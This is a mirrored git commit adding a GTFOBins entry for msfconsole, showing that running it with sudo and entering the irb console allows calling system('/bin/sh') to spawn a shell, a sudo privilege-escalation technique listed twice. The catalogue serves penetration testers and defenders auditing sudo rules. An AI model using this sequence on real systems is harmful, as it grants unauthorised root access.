mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-07-26 12:13:13 +02:00
Add msfconsole
This commit is contained in:
14
_gtfobins/msfconsole.md
Normal file
14
_gtfobins/msfconsole.md
Normal file
@@ -0,0 +1,14 @@
|
||||
---
|
||||
description: This allows to spawn a [`ruby`](/gtfobins/ruby/) interpreter.
|
||||
functions:
|
||||
shell:
|
||||
- code: |
|
||||
sudo msfconsole
|
||||
msf6 > irb
|
||||
>> system("/bin/sh")
|
||||
sudo:
|
||||
- code: |
|
||||
sudo msfconsole
|
||||
msf6 > irb
|
||||
>> system("/bin/sh")
|
||||
---
|
Reference in New Issue
Block a user